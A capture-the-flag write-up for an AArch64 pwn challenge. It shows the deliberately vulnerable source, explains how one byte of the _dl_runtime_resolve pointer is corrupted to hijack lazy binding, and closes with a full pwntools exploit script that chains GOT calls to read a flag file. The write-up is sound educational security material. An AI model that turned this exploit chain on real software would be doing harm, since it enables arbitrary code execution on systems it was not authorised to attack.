ʕ·ᴥ·ʔ






hopscotch

12/03/2023

By: unvariant

Tags: pwn NBCTF-2023

Problem Description:

Hints:

Reveal Hints: maybe you should take a closer look at how functions are resolved...

The source for the challenge is fairly simple:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stdint.h>

#define BUFSZ 0x4000

int bad_pwner_returning_to_main = 0;

/*
 * Padding function emitted into the .plt section instead of .text.
 *
 * The inline assembly expands to 0x10000 / 4 NOP instructions (AArch64
 * instructions are 4 bytes each, so 0x10000 bytes of padding) followed by a
 * single `udf #0`, an undefined instruction that traps if it is ever reached.
 *
 * NOTE(review): nothing in this file calls filler(); presumably it exists only
 * to enlarge .plt so the binary's layout suits the intended exploit -- confirm
 * with the challenge author.
 */
__attribute__((section(".plt"), leaf))
void filler() {
    asm volatile(
        /* Repeat the NOP 0x10000 / 4 times. */
        ".rept  0x10000 / 4\n"
        "nop\n"
        ".endr\n"
        /* Trap instead of falling through into whatever follows. */
        "udf #0\n"
    );
}

/*
 * Challenge entry point (intentionally vulnerable).
 *
 * 1. Traps if main is entered a second time.
 * 2. Prints every /proc/self/maps line containing "run" (the address leak).
 * 3. Reads an exit status, an address and a character from stdin, each as a
 *    full BUFSZ-byte read into the same stack buffer.
 * 4. Writes the first byte of the last read to the user-supplied address
 *    (the one-byte arbitrary write).
 * 5. Calls printf and then exit with the user-supplied status.
 */
int main(int argc, char **argv) {
    char *address, *old, *new;
    int fd;
    int status;
    /* 0x4000-byte stack buffer reused for the maps dump and all three inputs. */
    char buf[BUFSZ];

    /* Guard against returning into main: a second entry hits an undefined
       instruction. */
    if (bad_pwner_returning_to_main > 0) {
        asm volatile("udf #0");
    }
    bad_pwner_returning_to_main++;

    /* Disable stdio buffering on both streams. */
    setbuf(stdout, NULL);
    setbuf(stdin, NULL);

    /* Leak: dump the process memory map. The descriptor is never closed, and
       the return values of open/read are not checked. */
    fd = open("/proc/self/maps", O_RDONLY);
    read(fd, buf, BUFSZ);

    /* Split the dump on newlines in place and print only the lines that
       contain the substring "run". */
    old = buf;
    while ((new = strchr(old, '\n'))) {
        *new = 0;
        if (strstr(old, "run")) {
            puts(old);
        }
        old = new + 1;
    }

    /* Exit status, parsed as hexadecimal. */
    puts("exit status >");
    read(0, buf, BUFSZ);
    status = strtol(buf, NULL, 16);

    /* Target address for the write, parsed as hexadecimal. */
    puts("address >");
    read(0, buf, BUFSZ);
    address = (char *)strtol(buf, NULL, 16);

    /* Up to BUFSZ attacker-controlled bytes land on the stack here; only
       buf[0] is used as the byte to write. */
    puts("character >");
    read(0, buf, BUFSZ);
    *address = buf[0];
    
    /* First printf call in the program, made after the one-byte write. */
    printf("exiting with status: %d\n", status);
    exit(status);
}

Buffering is disabled and it leaks the address of the binary via /proc/self/maps. Also, as the challenge description alludes to, it allows a single-byte write to an address of the user's choice. There is no buffer overflow or other vulnerability, just a leak, a one-byte write, and stack control (each read fills the 0x4000-byte stack buffer with our input).

For this challenge I wanted to attack the _dl_runtime_resolve function that the linker uses to resolve GOT entries at runtime. If the binary protection is set to Partial RELRO or No RELRO, a function pointer to _dl_runtime_resolve is present in the binary. However, it is only writable with No RELRO.

First, let's take a look at the function resolution chain: when printf is called, it first calls the corresponding PLT entry for that function, which looks it up in the GOT and branches to it. hopscotch-thunk

If the function has not been resolved yet, the GOT entry will point to this function: hopscotch-plt-resolver

It saves the return address (x30) and the pointer to the GOT entry (x16) on the stack, then loads x16 with the address of PLTGOT[2] (the link_map pointer sits in the slot just below it) and calls _dl_runtime_resolve. The source for the aarch64 _dl_runtime_resolve is located at sysdeps/aarch64/dl-trampoline.S in the glibc source:


	/* Lazy-binding trampoline: saves the argument registers, asks
	   _dl_fixup() for the real address of the called function, restores
	   the registers and tail-jumps to that address.  */
	.text
	.globl _dl_runtime_resolve
	.type _dl_runtime_resolve, #function
	cfi_startproc
	.align 2
_dl_runtime_resolve:
	BTI_C
	/* AArch64 we get called with:
	   ip0		&PLTGOT[2]
	   ip1		temp(dl resolver entry point)
	   [sp, #8]	lr
	   [sp, #0]	&PLTGOT[n]
	 */

	cfi_rel_offset (lr, 8)

	/* Note: Saving x9 is not required by the ABI but the assembler requires
	   the immediate values of operand 3 to be a multiple of 16 */
	/* Allocate an 80+8*16 = 208 byte frame: x0-x9 in the first 80 bytes,
	   q0-q7 in the remaining 128.  */
	stp	x8, x9, [sp, #-(80+8*16)]!
	cfi_adjust_cfa_offset (80+8*16)
	cfi_rel_offset (x8, 0)
	cfi_rel_offset (x9, 8)

	stp	x6, x7, [sp,  #16]
	cfi_rel_offset (x6, 16)
	cfi_rel_offset (x7, 24)

	stp	x4, x5, [sp,  #32]
	cfi_rel_offset (x4, 32)
	cfi_rel_offset (x5, 40)

	stp	x2, x3, [sp,  #48]
	cfi_rel_offset (x2, 48)
	cfi_rel_offset (x3, 56)

	stp	x0, x1, [sp,  #64]
	cfi_rel_offset (x0, 64)
	cfi_rel_offset (x1, 72)

	stp	q0, q1, [sp, #(80+0*16)]
	cfi_rel_offset (q0, 80+0*16)
	cfi_rel_offset (q1, 80+1*16)

	/* NOTE(review): the CFI notes for q2-q7 below name q0/q1 again; this
	   looks like a copy-paste slip that only affects unwind info --
	   confirm against upstream before changing.  */
	stp	q2, q3, [sp, #(80+2*16)]
	cfi_rel_offset (q0, 80+2*16)
	cfi_rel_offset (q1, 80+3*16)

	stp	q4, q5, [sp, #(80+4*16)]
	cfi_rel_offset (q0, 80+4*16)
	cfi_rel_offset (q1, 80+5*16)

	stp	q6, q7, [sp, #(80+6*16)]
	cfi_rel_offset (q0, 80+6*16)
	cfi_rel_offset (q1, 80+7*16)

	/* Get pointer to linker struct.  */
	/* First argument of _dl_fixup: the word stored just below &PLTGOT[2].  */
	ldr	PTR_REG (0), [ip0, #-PTR_SIZE]

	/* Prepare to call _dl_fixup().  */
	/* The caller's [sp, #0] slot is now at frame size (208) from sp.  */
	ldr	x1, [sp, 80+8*16]	/* Recover &PLTGOT[n] */

	/* Second argument: x1 = 3 * (&PLTGOT[n] - &PLTGOT[2]) - RELA_SIZE.
	   The multiply by 3 is done as x1 + 2*x1; the shift left/right by 3
	   around the subtraction cancels out apart from clearing the top three
	   bits.  NOTE(review): RELA_SIZE is defined outside this excerpt;
	   presumably the size of one RELA relocation entry -- confirm.  */
	sub     x1, x1, ip0
	add     x1, x1, x1, lsl #1
	lsl     x1, x1, #3
	sub     x1, x1, #(RELA_SIZE<<3)
	lsr     x1, x1, #3

	/* Call fixup routine.  */
	bl	_dl_fixup

	/* Save the return.  */
	/* ip0 now holds the branch target; x0 is about to be reloaded.  */
	mov	ip0, x0

	/* Get arguments and return address back.  */
	/* Everything below is reloaded from the stack, not from live state.  */
	ldp	q0, q1, [sp, #(80+0*16)]
	ldp	q2, q3, [sp, #(80+2*16)]
	ldp	q4, q5, [sp, #(80+4*16)]
	ldp	q6, q7, [sp, #(80+6*16)]
	ldp	x0, x1, [sp, #64]
	ldp	x2, x3, [sp, #48]
	ldp	x4, x5, [sp, #32]
	ldp	x6, x7, [sp, #16]
	ldp	x8, x9, [sp], #(80+8*16)
	cfi_adjust_cfa_offset (-(80+8*16))

	/* Pop the two words the caller pushed: &PLTGOT[n] into ip1 (discarded)
	   and the saved return address into lr.  */
	ldp	ip1, lr, [sp], #16
	cfi_adjust_cfa_offset (-16)

	/* Jump to the newly found address.  */
	br	ip0

	cfi_endproc
	.size _dl_runtime_resolve, .-_dl_runtime_resolve

The resolver saves all the registers, loads link_map from x16 and the relocation index from the stack, and calls _dl_fixup to locate the real address of the function. Afterwards it restores all the registers and calls the resolved function.

Since we have a single-byte arbitrary write in the binary, we can modify the LSB of the _dl_runtime_resolve pointer and jump into the middle of the function instead of the start. This gives us control inside the function: if we skip the prologue where it saves the registers, we control the GOT index and the values of all the registers when it restores them from the stack, since we control whatever is on the stack from the previous reads. We control the function it resolves, all of the function's arguments, and the return address of the function, which allows us to call any function from the GOT with full argument control.

For example if we set the lsb so it starts here:

	/* Get pointer to linker struct.  */
	ldr	PTR_REG (0), [ip0, #-PTR_SIZE]

	/* Prepare to call _dl_fixup().  */
	ldr	x1, [sp, 80+8*16]	/* Recover &PLTGOT[n] */

	sub     x1, x1, ip0
	add     x1, x1, x1, lsl #1
	lsl     x1, x1, #3
	sub     x1, x1, #(RELA_SIZE<<3)
	lsr     x1, x1, #3

_dl_runtime_resolve will load link_map from x16 and the GOT index from the stack. We control the GOT index so we can redirect it to any function in the GOT.

	/* Call fixup routine.  */
	bl	_dl_fixup

	/* Save the return.  */
	mov	ip0, x0

	/* Get arguments and return address back.  */
	ldp	q0, q1, [sp, #(80+0*16)]
	ldp	q2, q3, [sp, #(80+2*16)]
	ldp	q4, q5, [sp, #(80+4*16)]
	ldp	q6, q7, [sp, #(80+6*16)]
	ldp	x0, x1, [sp, #64]
	ldp	x2, x3, [sp, #48]
	ldp	x4, x5, [sp, #32]
	ldp	x6, x7, [sp, #16]
	ldp	x8, x9, [sp], #(80+8*16)
	cfi_adjust_cfa_offset (-(80+8*16))

	ldp	ip1, lr, [sp], #16
	cfi_adjust_cfa_offset (-16)

	/* Jump to the newly found address.  */
	br	ip0

_dl_fixup is called to resolve the function and the address is stashed in x16. All the clobbered registers are restored from the stack, along with the return address, and the resolved function is called. We set the return address to the PLT resolver again, so when the resolved function returns we can trigger this again to call another arbitrary function from the GOT.

The GOT for this challenge holds open, read, and puts, so we can leverage them to open flag.txt, read it, and print it. If only read is available this attack still works; you just have to set up the proper ret2dlresolve structures in the .bss section first so you can call arbitrary libc functions.

small red herring

Some competitors were looking at this specific part of the resolver:

	/* Save the return.  */
	mov	ip0, x0

	/* Get arguments and return address back.  */
	ldp	q0, q1, [sp, #(80+0*16)]
	ldp	q2, q3, [sp, #(80+2*16)]
	ldp	q4, q5, [sp, #(80+4*16)]
	ldp	q6, q7, [sp, #(80+6*16)]
	ldp	x0, x1, [sp, #64]
	ldp	x2, x3, [sp, #48]
	ldp	x4, x5, [sp, #32]
	ldp	x6, x7, [sp, #16]
	ldp	x8, x9, [sp], #(80+8*16)
	cfi_adjust_cfa_offset (-(80+8*16))

	ldp	ip1, lr, [sp], #16
	cfi_adjust_cfa_offset (-16)

	/* Jump to the newly found address.  */
	br	ip0

If you control x0 you can call an arbitrary function with full argument control, as long as you know its address beforehand. The one function in the challenge where you do have control over x0 is exit, but it's not exploitable for two reasons. First, exit accepts a 32-bit int and the binary is always mapped somewhere above the 32-bit address space. Second, there is an unresolved printf call before the exit where x0 is not controlled, which would crash the program before reaching exit.

full solve script

from pwn import *
from time import sleep

# Target is AArch64, so fit()/flat() pack integers as 64-bit words.
context.clear(arch="arm64")
context.terminal = ["kitty"]

# Local copy of the challenge binary, used only for section and GOT offsets.
file = ELF("./runner")

env = {}
if args.GDB:
    # NOTE(review): presumably makes qemu-user wait for a gdb connection on
    # port 1337 -- confirm against the qemu-user documentation.
    env["QEMU_GDB"] = "1337"
if args.HOST and args.PORT:
    p = remote(args.HOST, args.PORT)
else:
    p = process(["qemu-aarch64", "-strace", "-D", "qemu.log", "-singlestep", "./run"], env=env)

# The first line the challenge prints is a /proc/self/maps entry; the hex
# number before the "-" is taken as the load base of the binary.
filebase = int(p.recvline().decode().split("-")[0], 16)
# Offset of the .got.plt slot at +0x10.
# NOTE(review): presumably PLTGOT[2], the slot holding the
# _dl_runtime_resolve pointer -- confirm against the binary.
resolver = file.get_section_by_name(".got.plt").header.sh_addr + 0x10
# Replacement least-significant byte for that pointer.
# NOTE(review): the value depends on the target's ld.so build -- confirm it
# lands on the intended instruction inside _dl_runtime_resolve.
overwrite = 0xac
# Offset 4 bytes into .plt; used as the fake return address so every called
# function returns into the PLT resolver stub.
# NOTE(review): presumably +4 skips the stub's first instruction -- confirm.
trampoline = file.get_section_by_name(".plt").header.sh_addr + 4

log.info(f"filebase @ {filebase:#x}")
log.info(f"resolver @ {resolver:#x}")

# "exit status >" prompt: any value works, send 0.
p.sendlineafter(b">", b"0")
# "address >" prompt: absolute address of the resolver slot, as hex.
p.sendlineafter(b">", f"{filebase + resolver:#x}".encode())

def call(func: str, *args):
    """Build one fake resolver stack frame that invokes ``func(*args)``.

    The layout mirrors what the tail of ``_dl_runtime_resolve`` reloads:

    * ``0x40``/``0x48`` hold the first argument pair, ``0x30``/``0x38`` the
      next, and so on downwards in 0x10 steps (two arguments per step).
    * ``0xd0`` holds the address of ``func``'s GOT entry, which selects the
      function to resolve.
    * ``0xd8`` holds the return address, pointed back at the PLT trampoline
      so the next frame is consumed when ``func`` returns.

    Args:
        func: Name of an imported function present in ``file.got``.
        *args: Integer argument values, in call order.

    Returns:
        The packed frame produced by pwntools ``fit``.
    """
    frame: dict[int, int] = {
        0xd0: filebase + file.got[func],
        0xd8: filebase + trampoline,
    }
    for position, value in enumerate(args):
        # pair selects the 0x10-byte slot pair, half the word inside it.
        pair, half = divmod(position, 2)
        frame[0x40 - pair * 0x10 + half * 8] = value
    return fit(frame)

# this first part of the payload is unnecessary, you can redirect to read immediately without going through printf
# but i was too lazy to recalculate all the offsets
# The payload is sent at the "character >" prompt, so it lands in main's stack
# buffer. Word 0 carries `overwrite`; its low byte becomes buf[0], the byte
# main writes to the chosen address.
# NOTE(review): offsets 0x08/0x98/0xa0 presumably line up with the stack slots
# the patched resolver entry reads on the first (printf) pass -- confirm in a
# debugger.
payload = fit({
    0x00: overwrite,
    0x08: filebase + file.got.printf,
    0x98: filebase + file.got.printf,
    0xa0: filebase + trampoline,
})
# Chain of fake frames, one per call:
# read(0, bss, 0x100) -- receive the flag path sent further below
payload += call("read", 0, filebase + file.bss(), 0x100)
# open(bss, 0) -- open that path read-only
payload += call("open", filebase + file.bss(), 0)
# read(4, bss, 0x100)
# NOTE(review): assumes open returned fd 4 (main leaves its /proc/self/maps
# descriptor open) -- confirm on the remote.
payload += call("read", 4, filebase + file.bss(), 0x100)
# puts(bss) -- print what was read
payload += call("puts", filebase + file.bss())
# exit(13) -- terminate
payload += call("exit", 13)
p.sendlineafter(b">", payload)

# NOTE(review): presumably gives the chain time to reach its first read before
# the path is sent -- confirm whether the delay is needed.
sleep(1)

# Consumed by the first chained read; the explicit NUL terminates the path.
p.sendline(b"flag.txt\x00")

p.interactive()